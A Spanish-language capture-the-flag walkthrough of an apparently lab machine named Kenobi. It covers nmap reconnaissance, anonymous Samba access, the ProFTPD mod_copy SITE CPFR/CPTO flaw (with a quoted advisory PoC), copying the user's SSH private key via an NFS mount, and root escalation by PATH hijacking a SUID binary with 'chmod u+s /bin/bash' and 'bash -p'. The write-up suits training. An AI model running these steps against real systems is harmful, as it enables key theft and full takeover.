Ahora hacemos un reconocimiento con nmap para detectar que puertos estan abiertos en el host.
-sS: Indica a Nmap que realice un escaneo de tipo SYN, también conocido como "escaneo stealth". -Pn: Esta opción indica a Nmap que ignore la detección de host y realice el escaneo de todas formas. -n: Indica a Nmap que no realice la resolución de nombres DNS. Esto acelera el escaneo.--open: Esta opción muestra solo los puertos que están abiertos.-vvv: Habilita la salida detallada y verbosa de Nmap.--min-rate 500: Establece la tasa mínima de envío de paquetes a 500 por segundo. Esto ayuda a acelerar el escaneo al aumentar la velocidad.
# Nmap 7.93 scan initiated Sat Jul 2923:02:182023 as: nmap -sCV -p21,22,80,111,139,445,2049-oN taget.txt 10.10.102.103Nmap scan report for 10.10.102.103Host is up (0.063s latency).PORTSTATESERVICEVERSION21/tcp open ftp ProFTPD 1.3.522/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)| ssh-hostkey:|2048b3ad834149e95d168d3b0f057be2c0ae (RSA)|256f8277d642997e6f865546522f7c81d8a (ECDSA)|_ 256 5a06edebb6567e4c01ddeabcbafa3379 (ED25519)80/tcp open http Apache httpd 2.4.18 ((Ubuntu))|_http-server-header: Apache/2.4.18 (Ubuntu)| http-robots.txt: 1 disallowed entry |_/admin.html|_http-title: Site doesn't have a title (text/html).111/tcp open rpcbind 2-4 (RPC #100000)| rpcinfo:| program version port/proto service|1000002,3,4111/tcp rpcbind|1000002,3,4111/udp rpcbind|1000003,4111/tcp6 rpcbind|1000003,4111/udp6 rpcbind|1000032,3,42049/tcp nfs|1000032,3,42049/tcp6 nfs|1000032,3,42049/udp nfs|1000032,3,42049/udp6 nfs|1000051,2,336369/tcp mountd|1000051,2,340681/udp mountd|1000051,2,343842/udp6 mountd|1000051,2,352273/tcp6 mountd|1000211,3,442561/tcp nlockmgr|1000211,3,442643/udp nlockmgr|1000211,3,444191/tcp6 nlockmgr|1000211,3,456149/udp6 nlockmgr|1002272,32049/tcp nfs_acl|1002272,32049/tcp6 nfs_acl|1002272,32049/udp nfs_acl|_ 1002272,32049/udp6 nfs_acl139/tcp open netbios-ssn Samba smbd 3.X- 4.X (workgroup: WORKGROUP)445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)2049/tcp open nfs_acl 2-3 (RPC #100227)Service Info: Host:KENOBI; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernelHost script results:|_clock-skew: mean: 1h40m12s, deviation: 2h53m12s, median: 12s|_nbstat: NetBIOS name:KENOBI, NetBIOS user: <unknown>, NetBIOS MAC: 000000000000 (Xerox)| smb-os-discovery: | OS: Windows 6.1 (Samba 4.3.11-Ubuntu)| Computer name: kenobi| NetBIOS computer name: KENOBI\x00| Domain name: \x00| FQDN: kenobi|_ System time: 2023-07-29T16:02:43-05:00| smb-security-mode: | account_used: guest| authentication_level: user| challenge_response: supported|_ message_signing: disabled (dangerous, but default)| smb2-security-mode: | 311: |_ Message signing enabled but not required| smb2-time: | date: 2023-07-29T21:02:43|_ start_date: N/AService detection performed. Please report any incorrect results at https://nmap.org/submit/ .# Nmap done at Sat Jul 29 23:02:33 2023 -- 1 IP address (1 host up) scanned in 15.35 seconds
Ahora lanzamos una nmap para ver que versiones y servicios corren para estos puertos que encontramos abiertos.
En el escaneo de Nmap observamos que tenemos el puerto 111 abierto , donde se ejecutaba el servicio rpcbind , es un servidor que convierte el numero de programa de llamada a procedimiento remoto en direcciones universales
Samba
Vamos a intentar verificar los recursos compartidos de samba mediante anonymous , para ello vamos a utilizar la herramienta smbclient
Observamos que logramos entrar y tenemos un archivo el cual nos lo descargamos a local para observar que nos dice.
log.txt
Generating public/private rsa key pair.Enter file in which to save the key (/home/kenobi/.ssh/id_rsa): Created directory '/home/kenobi/.ssh'.Enter passphrase (empty for no passphrase): Enter same passphrase again:Your identification has been saved in/home/kenobi/.ssh/id_rsa.Your public key has been saved in/home/kenobi/.ssh/id_rsa.pub.The key fingerprint is:SHA256:C17GWSl/v7KlUZrOwWxSyk+F7gYhVzsbfqkCIkr2d7Q kenobi@kenobiThe key's randomart image is:+---[RSA2048]----+||| .. || . o. . || ..=o +. || . So.o++o. || o ...+oo.Bo*o || o o ..o.o+.@oo || . . . E .O+= . || . . oBo. |+----[SHA256]-----+# This is a basic ProFTPD configuration file (rename it to # 'proftpd.conf' for actual use. It establishes a single server# and a single anonymous login. It assumes that you have a user/group# "nobody" and "ftp" for normal operation and anon.ServerName "ProFTPD Default Installation"ServerType standaloneDefaultServer on# Port 21 is the standard FTP port.Port 21# Don't use IPv6 support by default.UseIPv6 off# Umask 022 is a good standard umask to prevent new dirs and files# from being group and world writable.Umask 022# To prevent DoS attacks, set the maximum number of child processes# to 30. If you need to allow more than 30 concurrent connections# at once, simply increase thisvalue. Note that thisONLY works# in standalone mode,in inetd mode you should use an inetd server# that allows you to limit maximum number of processes per service# (such asxinetd).MaxInstances 30# Set the user and group under which the server will run.User kenobiGroup kenobi# To cause every FTP user to be "jailed" (chrooted) into their home# directory, uncomment this line.#DefaultRoot ~# Normally, we want files to be overwriteable.AllowOverwrite on# Bar use ofSITECHMOD by default<LimitSITE_CHMOD> DenyAll</Limit># A basic anonymous configuration, no upload directories. If you do not# want anonymous users, simply deletethis entire <Anonymous> section.<Anonymous ~ftp>UserftpGroupftp # Wewantclientstobeabletologinwith"anonymous"aswellas"ftp"UserAliasanonymousftp # LimitthemaximumnumberofanonymousloginsMaxClients 10 # Wewant'welcome.msg'displayedat login, and'.message'displayed # ineachnewlychdired directory.DisplayLogin welcome.msgDisplayChdir .message # LimitWRITEeverywhereintheanonymouschroot <Limit WRITE> DenyAll </Limit></Anonymous>## Sample configuration file for the Samba suite for Debian GNU/Linux.### This is the main Samba configuration file. You should read the# smb.conf(5) manual page in order to understand the options listed# here. Samba has a huge number of configurable options most of which # are not shown inthis example## Some options that are often worth tuning have been included as# commented-out examples inthis file.# - When such options are commented with ";", the proposed setting# differs from the default Samba behaviour# - When commented with "#", the proposed setting is the default# behaviour of Samba but the option is considered important# enough to be mentioned here## NOTE: Whenever you modify this file you should run the command# "testparm" to check that you have not made any basic syntactic # errors. #======================= Global Settings =======================[global]## Browsing/Identification #### Change this to the workgroup/NT-domain name your Samba server will part of workgroup =WORKGROUP# server string is the equivalent of the NT Description field server string =%h server (Samba, Ubuntu)# Windows Internet Name Serving Support Section:# WINS Support - Tells the NMBD component of Samba to enable its WINS Server# wins support = no# WINS Server - Tells the NMBD components of Samba to be a WINS Client# Note: Samba can be either a WINS Server, or a WINS Client, but NOT both; wins server =w.x.y.z# This will prevent nmbd to search for NetBIOS names through DNS. dns proxy = no#### Networking ##### The specific set of interfaces / networks to bind to# This can be either the interface name or an IP address/netmask;# interface names are normally preferred; interfaces =127.0.0.0/8 eth0# Only bind to the named interfaces and/or networks; you must use the# 'interfaces' option above to use this.# It is recommended that you enable this feature if your Samba machine is# not protected by a firewall or is a firewall itself. However,this# option cannot handle dynamic or non-broadcast interfaces correctly.; bind interfaces only = yes#### Debugging/Accounting ##### This tells Samba to use a separate log file for each machine# that connects log file =/var/log/samba/log.%m# Cap the size of the individual log files (in KiB). max log size =1000# If you want Samba to only log through syslog then set the following# parameter to 'yes'.# syslog only = no# We want Samba to log a minimum amount of information to syslog. Everything# should go to /var/log/samba/log.{smbd,nmbd} instead. If you want to log# through syslog you should set the following parameter to something higher. syslog =0# Do something sensible when Samba crashes: mail the admin a backtrace panic action =/usr/share/samba/panic-action %d####### Authentication ######## Server role. Defines in which mode Samba will operate. Possible# values are "standalone server","member server","classic primary# domain controller", "classic backup domain controller", "active# directory domain controller". ## Most people will want "standalone sever" or "member server".# Running as"active directory domain controller"willrequirefirst# running "samba-tool domain provision" to wipe databases and create a# new domain. server role = standalone server# If you are using encrypted passwords, Samba will need to know what# password database type you are using. passdb backend = tdbsam obey pam restrictions = yes# This boolean parameter controls whether Samba attempts to sync the Unix# password with the SMB password when the encrypted SMB password in the# passdb is changed. unix password sync = yes# For Unix password sync to work on a Debian GNU/Linux system, the following# parameters must be set (thanks to Ian Kahan <<kahan@informatik.tu-muenchen.de> for# sending the correct chat script for the passwd program in Debian Sarge). passwd program =/usr/bin/passwd %u passwd chat =*Enter\snew\s*\spassword:*%n\n *Retype\snew\s*\spassword:*%n\n *password\supdated\ssuccessfully* .# This boolean controls whether PAM will be used for password changes# when requested by an SMB client instead of the program listed in# 'passwd program'. The default is 'no'. pam password change = yes# This option controls how unsuccessful authentication attempts are mapped# to anonymous connections map to guest = bad user########## Domains ############# The following settings only takes effect if 'server role = primary# classic domain controller', 'server role = backup domain controller'# or 'domain logons' is set ## It specifies the location of the user's# profile directory from the client point of view) The following# required a [profiles] share to be setup on the samba server (see# below); logon path = \\%N\profiles\%U# Another common choice is storing the profile in the user's home directory# (this is Samba's default)# logon path = \\%N\%U\profile# The following setting only takes effect if 'domain logons' is set# It specifies the location of a user's home directory (from the client# point of view); logon drive = H:# logon home = \\%N\%U# The following setting only takes effect if'domain logons' is set# It specifies the script to run during logon. The script must be stored# in the [netlogon] share# NOTE: Must be store in'DOS' file format convention; logon script =logon.cmd# This allows Unix users to be created on the domain controller via the SAMR# RPCpipe. The example command creates a user account with a disabled Unix# password; please adapt to your needs; add user script =/usr/sbin/adduser --quiet --disabled-password --gecos ""%u# This allows machine accounts to be created on the domain controller via the # SAMRRPC pipe. # The following assumes a "machines" group exists on the system; add machine script =/usr/sbin/useradd -g machines -c "%u machine account"-d /var/lib/samba -s /bin/false %u# This allows Unix groups to be created on the domain controller via the SAMR# RPC pipe. ; add group script =/usr/sbin/addgroup --force-badname %g############ Misc ############# Using the following line enables you to customise your configuration# on a per machine basis. The %m gets replaced with the netbios name# of the machine that is connecting; include =/home/samba/etc/smb.conf.%m# Some defaults for winbind (make sure you're not using the ranges# for something else.); idmap uid =10000-20000; idmap gid =10000-20000; template shell =/bin/bash# Setup usershare options to enable non-root users to share folders# with the net usershare command.# Maximum number of usershare. 0 (default) means that usershare is disabled.; usershare max shares =100# Allow users who've been granted usershare privileges to create# public shares, not just authenticated ones usershare allow guests = yes#======================= Share Definitions =======================# Un-comment the following (and tweak the other settings below to suit)# to enable the default home directory shares. This will share each# user's home directory as \\server\username;[homes]; comment = Home Directories; browseable = no# By default, the home directories are exported read-only. Change the# next parameter to 'no'if you want to be able to write to them.; read only = yes# File creation mask is set to 0700 for security reasons. If you want to# create files with group=rw permissions, set next parameter to 0775.; create mask =0700# Directory creation mask is set to 0700 for security reasons. If you want to# create dirs. with group=rw permissions, set next parameter to 0775.; directory mask =0700# By default, \\server\username shares can be connected to by anyone# with access to the samba server.# Un-comment the following parameter to make sure that only "username"# can connect to \\server\username# This might need tweaking when usingexternal authentication schemes; valid users =%S# Un-comment the following and create the netlogon directory for Domain Logons# (you need to configure Samba to act asadomaincontrollertoo.);[netlogon]; comment = Network Logon Service; path =/home/samba/netlogon; guest ok = yes; read only = yes# Un-comment the following and create the profiles directory to store# users profiles (see the "logon path" option above)# (you need to configure Samba to act asadomaincontrollertoo.)# The path below should be writable by all users so that their# profile directory may be created the first time they log on;[profiles]; comment = Users profiles; path =/home/samba/profiles; guest ok = no; browseable = no; create mask =0600; directory mask =0700[printers] comment = All Printers browseable = no path =/var/spool/samba printable = yes guest ok = no read only = yes create mask =0700# Windows clients look for this share name asasourceofdownloadable# printer drivers[print$] comment = Printer Drivers path =/var/lib/samba/printers browseable = yes read only = yes guest ok = no# Uncomment to allow remote administration of Windows print drivers.# You may need to replace 'lpadmin'with the name of the group your# admin users are members of.# Please note that you also need to set appropriate Unix permissions# to the drivers directory for these users to have write rights in it; write list = root, @lpadmin[anonymous] path =/home/kenobi/share browseable = yes read only = yes guest ok = yes
Se puede observar que es una key de SSH
Explotacion FTP
Vamos a ver exploits que se van a poder utilizar, el FILE COPY
Description TJ Saunders 2015-04-0716:35:03UTCVadim Melihow reported a critical issue with proftpd installations that use themod_copy module's SITE CPFR/SITE CPTO commands; mod_copy allows these commandsto be used by *unauthenticated clients*:---------------------------------Trying 80.150.216.115...Connected to 80.150.216.115.Escape character is '^]'.220 ProFTPD 1.3.5rc3 Server (Debian) [::ffff:80.150.216.115]site help214-The following SITE commands are recognized (*=>'s unimplemented)214-CPFR<sp> pathname214-CPTO<sp> pathname214-UTIME<sp> YYYYMMDDhhmm[ss] <sp> path214-SYMLINK<sp> source <sp> destination214-RMDIR<sp> path214-MKDIR<sp> path214-The following SITE extensions are recognized:214-RATIO-- show all ratios in effect214-QUOTA214-HELP214-CHGRP214-CHMOD214 Direct comments to root@www01asite cpfr /etc/passwd350 File or directory exists, ready for destination namesite cpto /tmp/passwd.copy250 Copy successful-----------------------------------------He provides another, scarier example:------------------------------site cpfr /etc/passwd350 File or directory exists, ready for destination namesite cpto <?php phpinfo(); ?>550 cpto: Permission deniedsite cpfr /proc/self/fd/3350 File or directory exists, ready for destination namesite cpto /var/www/test.phptest.php now contains----------------------2015-04-0402:01:13,159 slon-P5Q proftpd[16255] slon-P5Q(slon-P5Q.lan[192.168.3.193]): error rewinding scoreboard: Invalid argument2015-04-0402:01:13,159 slon-P5Q proftpd[16255] slon-P5Q(slon-P5Q.lan[192.168.3.193]): FTP session opened.2015-04-0402:01:27,943 slon-P5Q proftpd[16255] slon-P5Q(slon-P5Q.lan[192.168.3.193]): error opening destination file '/<?phpphpinfo(); ?>' for copying: Permission denied-----------------------test.php contains contain correct php script "<?php phpinfo(); ?>" whichcan be run by the php interpreterSource: http://bugs.proftpd.org/show_bug.cgi?id=4169
Aca tenemos el POC del exploit, nosotros lo adecuaremos a nuestras necesidades.
NC
Vamos ah usar SITE CPFR y el comando SITE CPTO para copiar archivos/directorios de un lugar a otro en el servidor
Tenemos que tener en cuenta que tenemos un fichero llamado log.txt que el servicio ftp se esta ejecutando como el usuario de Kenobi y se genera la clave ssh para ese usuario
Tambien sabemos que tenemos acceso al directorio /var , que podemos montar en nuestro sistema. La clave privada de Kenobi se puede copiar al directorio /var/tmp
Montura
Por lo que vamos a montar el sistema var en un directorio que vamos a crear llamado /mnt/KenobiNFS/
sudo mount 10.10.102.103:/var /mnt/KenobiNFS/
id_rsa
Ahora que tenemos el montaje de red en nuestra maquina , podemos obtener la clave privada que se puede usar para iniciar sesion mediante SSH
Nos la copiamos a nuestra maquina local y le cambiamos los permisos para usarla para loguearnos por ssh usandola.
ssh
Como observamos nos podemos conectar usando la clave id_rsa, obtenemos la primera flag la del usuario.txt, ahora vamos por la segunda la de root.txt.
Observamos que si intentamos ingresar al directorio /root no podemos no tenemos los permisos suficientes, asi que hay que escalar privilegios.
Escalada de privilegios, PATH
Tenemos algo interesante /usr/bin/menu
Al ejecutar el binario , nos da 3 opciones. Las 3 opciones no son muy interesantes , pero usando el comando strings podemos buscar cadenas legibles.
Usando el comando strings podemos observar que por ahi anda curl, ifconfig, lo cual si su ruta no es absoluta y es relativa, podemos hacer un secuestro del PATH
Realizando el siguiente proceso vamos a poder obtener los permisos de administrador
chmodu+s/bin/bash
Punto uno estando en la ruta /dev/shm y hora si listo mi PATH con el comando echo $PATH me sale la ruta de mi PATH que /usr/local etc,etc
Punto dos sabiendo la ruta del PATH, ahora podriamos exportar el PATH y decirle que su inicio sea en /dev/shm y no como sale en el punto uno que su inicio es /usr/local etc,etc
Ahora vemos mas abajo que si listo mi PATH despues de haberlo exportado, vemos que ahora no inicia desde /usr/local etc si no que inicia desde /dev/shm:/usr/local etc. ya con esto echo nos queda poco por escalar nuestros privilegios
root
Nos ejecutamos el binario ./usr/bin/menu y no vemos nada como cuando lo ejecutamos por primera vez no vemos ese estilo de curl lo que significaria que ejecuto nuestro curl y no el original.
Punto dos hacemos un bash -p para usar la bash y elevar nuestros privilegios y buscar la flag que siempre esta en el directorio /root/root.txt
